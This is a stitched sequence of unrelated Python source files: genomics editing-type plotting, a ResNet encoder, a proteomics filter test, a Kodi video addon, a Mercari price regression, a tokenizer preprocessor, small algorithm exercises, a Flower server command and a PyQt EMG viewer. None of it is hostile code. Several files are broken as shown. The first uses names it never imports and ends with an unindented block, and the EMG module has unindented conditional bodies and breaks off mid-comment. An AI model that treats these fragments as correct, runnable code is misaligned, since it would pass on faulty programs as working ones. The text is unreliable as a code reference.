import re
import logging
from typing import Dict,List
from os import listdir
from os.path import isfile, join, dirname
from Utility.generators_utilities import group_generator
from Utility.count_utils import get_line_count
import pandas as pd
from Experiments.forontiers_jupyter.directory_structure_definer import DirectoryStructure,Stages,ConcensusStage,EditTypeStage
def editing_type_count_by_group_plot(lib_name, group_dict: Dict, dirstruct: DirectoryStructure, dict_colors):
    """
    Generate a plot showing the editing-type percentage distribution of the
    node groups.

    :param lib_name: name of the original library file
    :param group_dict: dict of the form {group_name: list_of_nodes_in_group}
    :param dirstruct: DirectoryStructure object for this RESIC run
    :param dict_colors: mapping of nucleotide combination -> bar color
    :return: populates the directory structure with
        * a per-node editing-type summary file for each group
        * an aggregate editing-type summary file for each group
        * a plot of the aggregate distribution across all groups
    """
    group_counts = dict()
    # Get aggregate counts per group.
    for group_name, group_nodes in group_dict.items():
        # Per-node editing-percent pileup and summary file names.
        editing_percent_pileups = [dirstruct.pathName(lib_name, node, Stages.editing_type_count, EditTypeStage.edit_percent_pileup)
                                   for node in group_nodes]
        summary_files = [dirstruct.pathName(lib_name, node, Stages.editing_type_count, EditTypeStage.file_summary)
                         for node in group_nodes]
        # Calculate the aggregate distribution for this group.
        aggregate_counts, count_summary, pileup_length = editing_site_count_per_type(editing_percent_pileups, summary_files)
        # Save it for the plot.
        group_counts[group_name] = aggregate_counts
        # NOTE(review): both files below are written from count_summary; the
        # first was probably meant to receive aggregate_counts — confirm
        # before changing the output format.
        aggregate_summary_file = dirstruct.pathName(lib_name, group_name, Stages.editing_type_count, EditTypeStage.group_distribution_summary)
        count_summary.to_csv(aggregate_summary_file)
        group_summary_file = dirstruct.pathName(lib_name, group_name, Stages.editing_type_count, EditTypeStage.group_count_summary)
        count_summary.to_csv(group_summary_file)
    # Generate the stacked-bar plot; plotting failures are logged, not fatal.
    try:
        plt.figure()
        group_names = [name for name in group_dict.keys()]
        data = pd.concat(aggregate_counts for aggregate_counts in group_counts.values())
        data.index = group_names
        data = data.transpose()
        plt_res, axes = stacked_bar(data, show_values=True, value_format="{:.3f}",
                                    y_label="Percent of sites", size_plot=[18, 20], use_dataframe=True, throw_zeros=True, dict_colors=dict_colors)
        # Put the legends outside of the plot area.
        plt_res.subplots_adjust(right=0.62)
        plt_res.legend(loc='center left', bbox_to_anchor=(1, 0.5), handles=axes[::-1])
        output_path = dirstruct.pathName(lib_name, None, Stages.editing_type_count, EditTypeStage.plot)
        plt_res.savefig(output_path)
        plt_res.show()
    except Exception:  # FIX: bare `except:` also trapped SystemExit/KeyboardInterrupt
        logging.exception("edit plot failed")
def editing_site_count_per_type(pileup_files, summary_files):
    """
    Build a dataframe whose rows are the pileup files and whose columns are
    the editing types; cell (i, j) holds the number of sites with editing
    type j in pileup i.

    (FIX: the original annotated the return as ``pd.DataFrame`` although a
    3-tuple is returned, and computed an unused ``total_length``.)

    :param pileup_files: list of path names of pileup files
    :param summary_files: one summary file per pileup, from the
        analyze-editing-percent step
    :return: (total_dist, summary, length_of_pileups) where
        total_dist: sum of counts per editing change type across all pileups
        summary: the per-pileup dataframe described above
        length_of_pileups: column vector of line counts per pileup file
    """
    # Vector of file lengths (number of candidate sites per pileup).
    length_of_pileups = [get_line_count(pileup) for pileup in pileup_files]
    # Editing-type percentages per file.
    summary_dfs = [load_summary_file_to_df(summary) for summary in summary_files]
    # Make the lengths a column vector so it broadcasts row-wise below.
    length_of_pileups = np.array(length_of_pileups).reshape([-1, 1])
    # Concatenate the per-file summaries into one big summary.
    summary = pd.concat(summary_dfs)
    # Multiply each row by its file length to turn percentages into absolute
    # site counts.
    absolute_lengths = length_of_pileups * summary.values
    summary.iloc[:, :] = np.array(absolute_lengths, dtype=np.int32)
    # Aggregate across files.
    total_dist = pd.DataFrame(summary.sum(axis=0)).transpose()
    return total_dist, summary, length_of_pileups
def load_summary_file_to_df(summary_file):
    """
    Parse one editing-percent summary file into a single-row dataframe whose
    columns are the editing types and whose row index is the file's basename.
    Returns None when the file is empty.

    TODO: currently assumes exactly one pileup is summarised per file.
    """
    with open(summary_file, "r") as fp:
        lines = fp.readlines()
    if len(lines) == 0:
        logging.warning(f"{summary_file} has zero lines")
        return None
    # First line carries the original pileup name (discarded); the second
    # holds the tab-separated "type:percent" pairs.
    _, edit_percents = lines[:2]
    # FIX: str.strip returns a new string — the original discarded it.
    edit_percents = edit_percents.strip('\n')
    edit_percents = re.split('\t|:', edit_percents)
    # Split the flat token stream into (key, value) pairs.
    keys, vals = zip(*group_generator(edit_percents, n=2))
    vals = np.array([float(v) for v in vals])
    # Assemble the single-row dataframe.
    file_name = os.path.basename(summary_file)
    df = pd.DataFrame(vals, index=keys, columns=[file_name])
    return df.transpose()
if __name__=="__main__":
pass
|
from torch import nn
from torchvision.models.resnet import ResNet, Bottleneck
class ResNetEncoder(ResNet):
    """
    Torchvision ResNet backbone adapted for dense prediction: the final stage
    uses dilation so the output stride is 16 instead of 32, the classifier
    head (global average pool + fully-connected layer) is removed, and
    `forward` returns the feature pyramid at strides 16, 8, 4, 2 and 1 for
    the decoder to consume.
    """

    # Residual-block counts of the four stages, per supported variant.
    layers = {
        'resnet50': [3, 4, 6, 3],
        'resnet101': [3, 4, 23, 3],
    }

    def __init__(self, in_channels, variant='resnet101', norm_layer=None):
        super().__init__(
            block=Bottleneck,
            layers=self.layers[variant],
            replace_stride_with_dilation=[False, False, True],
            norm_layer=norm_layer)
        # Swap the stem conv when the input is not 3-channel RGB.
        if in_channels != 3:
            self.conv1 = nn.Conv2d(in_channels, 64, 7, 2, 3, bias=False)
        # Drop the classification head: only the convolutional trunk remains.
        del self.avgpool
        del self.fc

    def forward(self, x):
        feat_1 = x                                 # stride 1
        x = self.relu(self.bn1(self.conv1(x)))
        feat_2 = x                                 # stride 2
        x = self.layer1(self.maxpool(x))
        feat_4 = x                                 # stride 4
        x = self.layer2(x)
        feat_8 = x                                 # stride 8
        x = self.layer4(self.layer3(x))
        feat_16 = x                                # stride 16 (dilated stage)
        return feat_16, feat_8, feat_4, feat_2, feat_1
|
import unittest
from metaquantome.util.testutils import testfile, TTEST_SINFO
from metaquantome.util import stat_io
from metaquantome.util.utils import TEST_DIR
from metaquantome.classes.SampleGroups import SampleGroups
from metaquantome.modules.filter import run_filter
from metaquantome.modules.expand import expand
class TestFilter(unittest.TestCase):
    """Integration tests for the expand → filter pipeline on taxonomy data."""

    def testRead(self):
        # A single-sample group suffices to round-trip the expanded table.
        groups = SampleGroups('{"samp1": "int"}')
        table = stat_io.read_expanded_table(testfile('taxonomy_write_simple.tab'), groups)
        self.assertIn('Helicobacter', table['taxon_name'].tolist())

    def testFilter(self):
        intensity_file = testfile('filt_int.tab')
        taxonomy_file = testfile('multiple_tax.tab')
        expand_output = testfile('expand_out.tab')
        expanded = expand('t', TTEST_SINFO, int_file=intensity_file, pep_colname_int='peptide',
                          pep_colname_func='peptide', pep_colname_tax='peptide', data_dir=TEST_DIR,
                          outfile=expand_output, tax_file=taxonomy_file, tax_colname='lca')
        expanded_ids = set(expanded['id'])
        # With every threshold at zero, filtering must be an id-level no-op.
        unfiltered = run_filter(expand_output, TTEST_SINFO, ontology=None, mode="t", qthreshold=0,
                                min_child_non_leaf=0, min_child_nsamp=0, min_peptides=0, min_pep_nsamp=0)
        self.assertSetEqual(set(unfiltered['id']), expanded_ids)
        # Requiring 3 intensities per group must drop taxa 1496 and 1870884.
        strict = run_filter(expand_output, TTEST_SINFO, ontology=None, mode="t", qthreshold=3,
                            min_child_non_leaf=0, min_child_nsamp=0, min_peptides=0, min_pep_nsamp=0)
        strict_ids = set(strict['id'])
        self.assertNotIn(1496, strict_ids)
        self.assertNotIn(1870884, strict_ids)
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
|
# -*- coding: utf-8 -*-
"""
Catch-up TV & More
Copyright (C) 2017 SylvainCecchetto
This file is part of Catch-up TV & More.
Catch-up TV & More is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
Catch-up TV & More is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with Catch-up TV & More; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
# The unicode_literals import only has
# an effect on Python 2.
# It makes string literals as unicode like in Python 3
from __future__ import unicode_literals
from codequick import Route, Resolver, Listitem, utils, Script
from resources.lib.labels import LABELS
from resources.lib import web_utils
from resources.lib import download
from resources.lib.menu_utils import item_post_treatment
import re
import urlquick
# TO DO
# Add info LIVE TV, Replay
URL_ROOT = 'http://zonevideo.telequebec.tv'
URL_LIVE = 'https://player.telequebec.tv/Tq_VideoPlayer.js'
URL_EMISSIONS = URL_ROOT + '/a-z/'
URL_STREAM = 'https://mnmedias.api.telequebec.tv/m3u8/%s.m3u8'
# VideoId
def replay_entry(plugin, item_id, **kwargs):
    """First function executed after replay_bridge; delegates straight to the
    programme listing."""
    return list_programs(plugin, item_id)
@Route.register
def list_programs(plugin, item_id, **kwargs):
    """
    Build the programme listing from the A-Z page: one folder item per show,
    each resolving to its video list.
    """
    page = urlquick.get(URL_EMISSIONS)
    listing = page.parse("div", attrs={"class": "list"})
    for entry in listing.iterfind(".//li"):
        link = entry.find('.//a')
        item = Listitem()
        item.label = link.text
        item.set_callback(list_videos,
                          item_id=item_id,
                          program_url=URL_ROOT + link.get('href'))
        item_post_treatment(item)
        yield item
@Route.register
def list_videos(plugin, item_id, program_url, **kwargs):
    """List every video card of one programme page as a playable item."""
    page = urlquick.get(program_url)
    root = page.parse()
    for card in root.iterfind(".//div[@class='item']"):
        # The <p> text doubles as the plot; its first ' / ' segment plus the
        # headline link forms the display title.
        synopsis = card.find('.//p').text
        title = synopsis.split(' / ')[0] + ' - ' + card.find('.//h4').find('.//a').text
        item = Listitem()
        item.label = title
        item.art['thumb'] = item.art['landscape'] = card.find('.//img').get('src')
        item.info['plot'] = synopsis
        item.set_callback(get_video_url,
                          item_id=item_id,
                          video_id=card.get('data-mediaid'))
        item_post_treatment(item, is_playable=True, is_downloadable=True)
        yield item
@Resolver.register
def get_video_url(plugin,
                  item_id,
                  video_id,
                  download_mode=False,
                  **kwargs):
    """Resolve a media id to its HLS stream URL, or hand the stream to the
    downloader when download_mode is set."""
    stream_url = URL_STREAM % video_id
    if download_mode:
        return download.download_video(stream_url)
    return stream_url
def live_entry(plugin, item_id, **kwargs):
    """Live-TV entry point; the upper-cased channel id doubles as video id."""
    return get_live_url(plugin, item_id, item_id.upper())
@Resolver.register
def get_live_url(plugin, item_id, video_id, **kwargs):
    """Scrape the player script for the protocol-relative live m3u8 URL."""
    player_js = urlquick.get(URL_LIVE)
    m3u8_urls = re.compile(r'm3U8Url:"(.*?)"').findall(player_js.text)
    return 'https:' + m3u8_urls[0]
|
# Add two numbers, print the result, then accumulate that result i times.
num1 = 1
num2 = 2
num = num1 + num2
print(num)

# FIX: the original loop used `while i < 0` (the body could never run),
# never decremented i (so it would have spun forever if it did run), and
# added into an uninitialised name `sum` that also shadowed the builtin.
total = 0
i = 5
while i > 0:
    total += num
    i -= 1
print(total)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 12 22:22:10 2018
@author: sudhir
"""
# =============================================================================
# Import packages
# =============================================================================
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import missingno as msno
import time
from sklearn.linear_model import LinearRegression, Ridge
from sklearn.model_selection import KFold, train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer,CountVectorizer
from sklearn.preprocessing import LabelEncoder,LabelBinarizer
from scipy.sparse import hstack, csc_matrix
from nltk.corpus import stopwords
import re
import gc
seed = 321
# =============================================================================
# Read data set
# =============================================================================
start_time = time.time()
#path ='../input/'
path = 'file/'
# nrows=None loads the full TSV files.
train = pd.read_csv(path+'train.tsv',sep='\t',nrows=None)
test = pd.read_csv(path+'test.tsv',sep='\t',nrows=None)
print('Number of rows and columns in train data set is :',train.shape)
# FIX: corrected the 'teset' typo in this user-facing message.
print('Number of rows and columns in test data set is :',test.shape)
# Feature-pruning hyper-parameters.
NUM_BRANDS = 4500
NUM_CATEGORIES = 1290
NAME_MIN_Df = 10
MAX_FEAT_DESCP = 50000
nrow_train = train.shape[0]
# Train on log1p(price); predictions are inverted with expm1 at submission.
y = np.log1p(train['price'])
submit = pd.DataFrame( {'test_id':test['test_id']})
# Stack train and test so text/categorical encoders see the full vocabulary.
df = pd.concat([train,test])
# =============================================================================
# Evaluation metric
# =============================================================================
def rmsle(y_true, y_pred):
    """Root mean squared logarithmic error between two equal-length arrays.

    FIX: uses np.log1p instead of np.log(x + 1) for numerical stability
    near zero (identical mathematically).
    """
    assert len(y_true) == len(y_pred)
    return np.square(np.log1p(y_pred) - np.log1p(y_true)).mean() ** 0.5
# =============================================================================
# data analysis
# =============================================================================
# Interactive sanity checks; when run as a script these expressions are
# evaluated and discarded (only useful in a REPL/IDE).
train.head()
test.head()
train.describe(include='all').T
test.describe(include='all').T
# Null counts per column, train vs test, collected in one small frame.
k = pd.DataFrame()
k['train'] = train.isnull().sum()
k['test'] = test.isnull().sum() ;k
# =============================================================================
# Feature engineering
# =============================================================================
def missing_data(d):
    """Fill NaNs in the text columns of `d` with the literal 'missing',
    in place."""
    for column in ('brand_name', 'item_description', 'general_cat', 'subcat_1', 'subcat_2'):
        d[column].fillna(value='missing', inplace=True)
def split_cat(text):
    """Split a 'general/sub1/sub2' category string into its parts; non-string
    input (e.g. NaN) yields the 3-tuple of 'No Label' placeholders.

    FIX: catches only AttributeError — the original bare `except` also
    swallowed SystemExit/KeyboardInterrupt.
    """
    try:
        return text.split('/')
    except AttributeError:
        return ('No Label', 'No Label', 'No Label')
def cutting_data(d):
    """Keep only the most frequent brands/categories in `d` (in place); all
    other values are mapped to 'missing'.

    FIX: the original computed pop_category three times but each assignment
    overwrote the previous one, so all three category columns were filtered
    by subcat_2's top values only; it also read the global `df` instead of
    the `d` parameter. Each column now gets its own top-NUM_CATEGORIES
    whitelist computed from `d`.
    """
    pop_brands = d['brand_name'].value_counts().loc[lambda x: x.index != 'missing'].index[:NUM_BRANDS]
    d.loc[~d['brand_name'].isin(pop_brands), 'brand_name'] = 'missing'
    for col in ('general_cat', 'subcat_1', 'subcat_2'):
        pop_category = d[col].value_counts().loc[lambda x: x.index != 'missing'].index[:NUM_CATEGORIES]
        d.loc[~d[col].isin(pop_category), col] = 'missing'
def category_variable(d):
    """Convert the categorical columns of `d` to pandas 'category' dtype,
    in place.

    FIX: the original converted subcat_1 twice and never converted subcat_2.
    """
    for col in ('brand_name', 'item_condition_id', 'general_cat', 'subcat_1', 'subcat_2'):
        d[col] = d[col].astype('category')
# Derive the three category levels from the slash-separated category_name.
df['general_cat'], df['subcat_1'], df['subcat_2'] = \
    zip(*df['category_name'].apply(lambda x: split_cat(x)))
print("[{}] Finished split category".format(time.time()-start_time))
missing_data(df)
print('[{}] Finshed handling missing value '.format(time.time()-start_time))
cutting_data(df)
print('[{}] Fininshed cutting'.format(time.time()-start_time))
category_variable(df)
print('[{}] Finished converting to category'.format(time.time()-start_time))
# Bag-of-words on the item title.
cv = CountVectorizer(min_df=NAME_MIN_Df)
X_name = cv.fit_transform(df['name'])
print('[{}] Finished count vector name'.format(time.time()-start_time))
# One count matrix per category level (the same vectorizer is refit each time).
cv = CountVectorizer(min_df=NAME_MIN_Df)
X_general = cv.fit_transform(df['general_cat'])
X_subcat_1 = cv.fit_transform(df['subcat_1'])
X_subcat_2 = cv.fit_transform(df['subcat_2'])
print('[{}] Finished count category name'.format(time.time()-start_time))
# TF-IDF over the free-text description, up to trigrams.
tv = TfidfVectorizer(max_features=MAX_FEAT_DESCP, stop_words='english',
                     lowercase=True,analyzer='word', dtype=np.float32,
                     ngram_range=(1,3))
X_desciption = tv.fit_transform(df['item_description'])
print('[{}] Finished TFIDF vector name'.format(time.time()-start_time))
# Sparse one-hot encoding of the brand.
lb = LabelBinarizer(sparse_output=True)
X_brand = lb.fit_transform(df['brand_name'])
print('[{}] Finished label binarizer brand name'.format(time.time()-start_time))
X_dummies = csc_matrix(pd.get_dummies(df[['item_condition_id','shipping']],
                                      sparse=True).values)
print("[{}] Finished to dummies on 'item_condition_id','shipping'".format(time.time()-start_time))
# Stack every feature family into one CSR design matrix.
sparse_df = hstack((X_brand, X_general, X_subcat_1, X_subcat_2, X_desciption, X_name,X_dummies)).tocsr()
print("[{}] Finished to sparse".format(time.time()-start_time))
# Split back into the original train/test rows (df was their concatenation).
X = sparse_df[:nrow_train]
X_test = sparse_df[nrow_train:]
# =============================================================================
# Model
# =============================================================================
rdg_model = Ridge(solver='sag',fit_intercept=True, random_state = seed)
rdg_model.fit(X,y)
print("[{}] Finished to train Ridge".format(time.time()-start_time))
pred = rdg_model.predict(X_test)
print("[{}] Finished to predict Ridge".format(time.time()-start_time))
# =============================================================================
# Submission
# =============================================================================
#pred = np.abs(pred)
# expm1 undoes the log1p applied to price before training.
submit = pd.DataFrame({'test_id':test['test_id'],'price':np.expm1(pred)})
#submit.to_csv('mercari.csv.gz',index=False,compression='gzip')
submit.to_csv('mercari.csv',index=False)
submit.head()
import sys
from transformers import AutoTokenizer
def preprocess(dataset, destination, model_name_or_path, max_len):
    """Re-chunk a CoNLL-style token-per-line file so that no block exceeds
    `max_len` subwords under the given tokenizer.

    Blank lines (sentence boundaries) reset the subword counter and are
    passed through; when adding the next token would overflow `max_len`, a
    blank line is inserted to start a new block. Tokens that tokenize to
    zero subwords (strange control characters like \\x96/\\x95) are dropped.
    """
    subword_len_counter = 0
    tokenizer = AutoTokenizer.from_pretrained(model_name_or_path)
    # FIX: the output handle was opened without ever being closed; both
    # files are now managed by `with`, so they are flushed/closed on any exit.
    with open(destination, 'w', encoding='utf-8') as destination_file, \
            open(dataset, "r", encoding='utf-8') as f_p:
        for line in f_p:
            line = line.rstrip()
            if not line:
                destination_file.write(line + '\n')
                subword_len_counter = 0
                continue
            token = line.split()[0]
            current_subwords_len = len(tokenizer.tokenize(token))
            # Token contains strange control characters — skip the line.
            if current_subwords_len == 0:
                continue
            if (subword_len_counter + current_subwords_len) > max_len:
                destination_file.write('\n%s\n' % line)
                # FIX: the line just written starts the new block, so the
                # counter must include its subwords (was reset to 0).
                subword_len_counter = current_subwords_len
                continue
            subword_len_counter += current_subwords_len
            destination_file.write(line + '\n')
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 12:26:35 2019
@author: Caio
"""
def newton_method(number, number_iters = 500):
    """Approximate the square root of ``number`` with Newton's method.

    Iterates x_(n+1) = 0.5 * (x_n + a / x_n) starting from a.

    :param number: non-negative value to take the square root of
    :param number_iters: maximum iteration count (default 500)
    :return: float approximation of sqrt(number)
    :raises ValueError: if number is negative (original diverged silently)
    """
    a = float(number)  # number to get square root of
    if a < 0:
        raise ValueError('square root of a negative number is undefined')
    if a == 0:
        # Original raised ZeroDivisionError on 0; sqrt(0) is simply 0.
        return 0.0
    x = a
    for _ in range(number_iters):
        new_x = 0.5 * (x + a / x)  # x_(n+1) = 0.5 * (x_n + a / x_n)
        if new_x == x:
            # Reached the floating-point fixed point; further loops are wasted.
            break
        x = new_x
    return x
# Demo: square roots of a perfect square and of 2.
for sample in (9, 2):
    print(newton_method(sample))
|
import add1
def comp(ke):
    """Return the two's complement of a 32-bit binary string.

    Flips every bit ('0' <-> '1') and adds one via add1.add.
    Assumes ``ke`` is a str of '0'/'1' characters -- TODO confirm callers.
    """
    one = '00000000000000000000000000000001'
    # Invert all bits in a single pass.
    flipped = ke.translate(str.maketrans('01', '10'))
    # flipped = bin(int(flipped, 2) + int(one, 2))[2:].zfill(32)
    return add1.add(flipped, one)
from __future__ import absolute_import
import logging
from pprint import pformat
from tornado.options import define, options, parse_command_line
from celery.bin.base import Command
from . import settings
from .app import Flower
# Tornado command-line options understood by the Flower web server.
define("port", default=5555, help="run on the given port", type=int)
define("address", default='', help="run on the given address", type=str)
define("debug", default=False, help="run in debug mode", type=bool)
define("inspect", default=True, help="inspect workers", type=bool)
define("inspect_timeout", default=1000, type=float,
       help="inspect timeout (in milliseconds)")
define("auth", default='', type=str,
       help="comma separated list of emails to grant access")
define("url_prefix", type=str, help="base url prefix")
class FlowerCommand(Command):
    """Celery sub-command that boots the Flower monitoring web server."""

    def run_from_argv(self, prog_name, argv=None):
        """Parse Flower-specific CLI options and start the Tornado app.

        :param prog_name: program name prepended when parsing the command line
        :param argv: raw argument list; only options tornado knows are kept
        """
        app_settings = settings.APP_SETTINGS
        # Materialize as lists: on Python 3 filter()/map() return lazy
        # iterators, which breaks `[prog_name] + argv` and the auth list.
        argv = list(filter(self.flower_option, argv))
        parse_command_line([prog_name] + argv)
        auth = list(map(str.strip, options.auth.split(','))) if options.auth else []
        app_settings['debug'] = options.debug
        if options.url_prefix:
            prefix = options.url_prefix.strip('/')
            app_settings['static_url_prefix'] = '/{0}/static/'.format(prefix)
            settings.URL_PREFIX = prefix
        settings.CELERY_INSPECT_TIMEOUT = options.inspect_timeout
        flower = Flower(celery_app=self.app, auth=auth, **app_settings)
        logging.info('Visit me at http://%s:%s' %
                     (options.address or 'localhost', options.port))
        logging.info('Broker: %s', self.app.connection().as_uri())
        logging.debug('Settings: %s' % pformat(app_settings))
        try:
            flower.start(options.port, address=options.address,
                         inspect=options.inspect)
        except (KeyboardInterrupt, SystemExit):
            # Normal shutdown paths; exit quietly.
            pass

    def handle_argv(self, prog_name, argv=None):
        """Celery entry point; delegates to run_from_argv."""
        return self.run_from_argv(prog_name, argv)

    @staticmethod
    def flower_option(arg):
        """Return True when ``arg`` (e.g. '--port=80') names a known tornado option."""
        name, _, value = arg.lstrip('-').partition("=")
        name = name.replace('-', '_')
        return name in options
|
# -*- coding: utf-8 -*-
# @Time : 2017/12/5 18:15
# @Author : Zhiwei Yang
# @File : bucket_sort.py.py
def bucket_sort(nums):
    """Sort a list of non-negative integers with counting (bucket) sort.

    :param nums: list of non-negative ints; duplicates allowed
    :return: new list with the values in ascending order
    """
    if not nums:
        # max() would raise on an empty list; empty in, empty out.
        return []
    counts = [0] * (max(nums) + 1)
    for n in nums:
        counts[n] += 1
    # Removed the leftover debug print of the raw bucket array.
    sorted_nums = []
    for value, count in enumerate(counts):
        # Duplicates are emitted `count` times (count may be 0).
        sorted_nums.extend([value] * count)
    return sorted_nums
if __name__ == '__main__':
    # Quick demo run with duplicate values.
    sample = [5, 6, 6, 6, 2, 1, 65, 9]
    print(bucket_sort(sample))
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
# FEDERAL UNIVERSITY OF UBERLANDIA
# Faculty of Electrical Engineering
# Biomedical Engineering Lab
# ------------------------------------------------------------------------------
# Author: Italo Gustavo Sampaio Fernandes
# Contact: italogsfernandes@gmail.com
# Git: www.github.com/italogfernandes
# ------------------------------------------------------------------------------
# Description:
# ------------------------------------------------------------------------------
from ArduinoEMGPlotter import ArduinoEMGPlotter
import numpy as np
import scipy as sp
import sys
if sys.version_info.major == 3:
# PyQt5
from PyQt5.QtWidgets import *
from views import base_qt5 as base
from PyQt5 import QtCore
# from PyQt5.QtCore import SIGNAL
from views import config_processamento_qt5 as config_window
elif sys.version_info.major == 2:
# PyQt4
from PyQt4.QtGui import *
from views import base_qt4 as base
from PyQt4 import QtCore
from PyQt4.QtCore import SIGNAL
from views import config_processamento_qt4 as config_window
else:
print("Versao do python nao suportada")
# ------------------------------------------------------------------------------
import matplotlib.pyplot as plt # Showing images
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
# ------------------------------------------------------------------------------
from matplotlib.figure import Figure
import matplotlib.animation as animation
class SetupApp(QMainWindow, config_window.Ui_windowConfig):
    """Configuration dialog for choosing the EMG processing type."""

    def __init__(self, parent=None):
        super(SetupApp, self).__init__(parent)
        self.setupUi(self)
        # Define a new signal called 'trigger' that has no arguments.
        # self.trigger = QtCore.pyqtSignal()
        self.setup_signals_connections()
        self.tipos_de_processamento = ['Desativado', 'Simples', 'Plotter', 'Thread']
        self.populate_cb()

    def setup_signals_connections(self):
        """Wire the combo-box change signal to its handler."""
        self.comboBox.currentIndexChanged.connect(self.setup_changed)

    def populate_cb(self):
        """Fill the combo box with all processing types; select the first."""
        self.comboBox.clear()
        self.comboBox.addItems(self.tipos_de_processamento)
        self.comboBox.setCurrentIndex(0)

    def setup_changed(self):
        """React to a new selection in the combo box."""
        proc = self.comboBox.itemText(self.comboBox.currentIndex())
        # print("Setup Changed to:")
        # print(proc)
        # self.trigger.emit(SIGNAL("proc_changed(QString)"), proc)

    def closeEvent(self, q_close_event):
        """Forward the close event to the Qt base class."""
        super(SetupApp, self).closeEvent(q_close_event)
class ContractionDetector(QMainWindow, base.Ui_MainWindow):
    """Main window: live pyqtgraph EMG plot plus an embedded matplotlib canvas."""

    def __init__(self, parent=None):
        super(self.__class__, self).__init__(parent)
        self.setupUi(self)
        self.setup_signals_connections()
        # Matplotlib figure/canvas/toolbar embedded below the EMG plot.
        self.edited_image_fig = Figure(figsize=(0.1, 0.1))
        self.edited_image_canvas = FigureCanvas(self.edited_image_fig)
        self.edited_image_toolbar = NavigationToolbar(
            self.edited_image_canvas, self, coordinates=True)
        # Placeholder sine wave so the axes are not empty at startup.
        time_example = np.linspace(0, 1, 100)
        y_example = np.sin(2 * np.pi * 3 * time_example)
        gca_example = self.edited_image_fig.gca()
        # gca_example.hold(False)
        # gca_example.plot([0]*100)
        self.line, = gca_example.plot(y_example)
        # gca_example.hold(False)
        gca_example.set_title("MMN")
        gca_example.grid(True)
        gca_example.set_xlabel('Index')
        gca_example.set_ylabel('MMN')
        # EMG acquisition/plotting backend; shares the figure and line above.
        self.emg_app = ArduinoEMGPlotter(
            parent=self.centralwidget,
            label=self.lbl_status,
            edited_image_fig=self.edited_image_fig,
            line=self.line,
            canvas=self.edited_image_canvas,
        )
        self.verticalLayoutGraph.addWidget(self.emg_app.plotHandler.plotWidget)
        # Swap the designer placeholder label for the live plot widget.
        self.verticalLayoutGraph.removeWidget(self.label_replace)
        self.label_replace.setParent(None)
        self.cb_emg.toggle()
        # NOTE(review): QSlider.setValue expects an int; 0.25 looks like a
        # value meant for the 0-1 threshold scale -- confirm intent.
        self.sl_threshould.setValue(0.25)
        self.sl_threshould_value_changed(10)
        self.proc_changed("Desativado")
        self.edited_image_canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.edited_image_canvas.updateGeometry()
        self.verticalLayoutGraph.addWidget(self.edited_image_canvas)
        self.edited_image_canvas.draw()
        self.verticalLayoutGraph.addWidget(self.edited_image_toolbar)
        # call the animator
        # self.anim = animation.FuncAnimation(
        #     self.edited_image_fig, self.animate,
        #     frames=500, interval=1000, blit=True
        # )

    # def animate(self, i):
    #     self.line.set_data(
    #         np.arange(0, len(self.emg_app.resultado)),
    #         self.emg_app.resultado
    #     )
    #     return self.line,

    def update_matplotlib_chart(self, y_data=None):
        """Plot ``y_data`` (default: a demo sine wave) on the embedded figure."""
        if y_data is None:
            time_example = np.linspace(0, 1, 100)
            y_data = np.sin(2 * np.pi * 3 * time_example)
        gca_example = self.edited_image_fig.gca()
        gca_example.lines.append(gca_example.plot(y_data))
        gca_example.set_title("MMN")
        gca_example.grid()
        gca_example.set_xlabel('Index')
        gca_example.set_ylabel('Media do sinal')

    def setup_signals_connections(self):
        """Connect buttons, slider and visibility checkboxes to handlers."""
        #self.actionProcessamento.triggered.connect(self.processamento_clicked)
        self.btn_start.clicked.connect(self.btn_start_clicked)
        self.btn_calib.clicked.connect(self.btn_calib_clicked)
        self.sl_threshould.valueChanged.connect(self.sl_threshould_value_changed)
        # Each checkbox toggles visibility of one curve on the plot handler.
        self.cb_emg.toggled.connect(lambda x: self.emg_app.plotHandler.emg_bruto.set_visible(x))
        self.cb_hbt.toggled.connect(lambda x: self.emg_app.plotHandler.hilbert.set_visible(x))
        self.cb_ret.toggled.connect(lambda x: self.emg_app.plotHandler.hilbert_retificado.set_visible(x))
        self.cb_env.toggled.connect(lambda x: self.emg_app.plotHandler.envoltoria.set_visible(x))
        self.cb_lim.toggled.connect(lambda x: self.emg_app.plotHandler.threshold.set_visible(x))
        self.cb_det.toggled.connect(lambda x: self.emg_app.plotHandler.set_detection_visible(x))
        #self.connect(setup_form, SIGNAL("proc_changed(QString)"), self.proc_changed)

    def proc_changed(self, new_proc):
        """Forward the selected processing type to the EMG backend."""
        print(new_proc)
        self.emg_app.update_proc_type(new_proc)

    def closeEvent(self, q_close_event):
        """Stop acquisition before letting Qt close the window."""
        self.emg_app.stop()
        super(self.__class__, self).closeEvent(q_close_event)

    def processamento_clicked(self):
        """Show the (module-level) configuration dialog."""
        setup_form.show()

    def btn_start_clicked(self):
        """Toggle acquisition and update the button label accordingly."""
        if self.emg_app.started:
            self.emg_app.stop()
            self.btn_start.setText('Start')
        else:
            self.emg_app.start()
            self.btn_start.setText('Stop')

    def btn_calib_clicked(self):
        # NOTE(review): QtCore.QString exists only under PyQt4/Python 2; on
        # PyQt5 this line raises AttributeError -- confirm targeted bindings.
        self.lbl_status.setText(QtCore.QString.fromUtf8("Status: Calibração não implementada."))

    def sl_threshould_value_changed(self, sl_value):
        """Map the integer slider value (0-100) onto a 0.0-1.0 threshold."""
        # self.lbl_threshould.setText("Limiar:\n%.2f" % (sl_value * 1.0 / 100))
        self.emg_app.plotHandler.set_threshold(sl_value * 1.0 / 100)
# Build the Qt application and both windows at import time so that
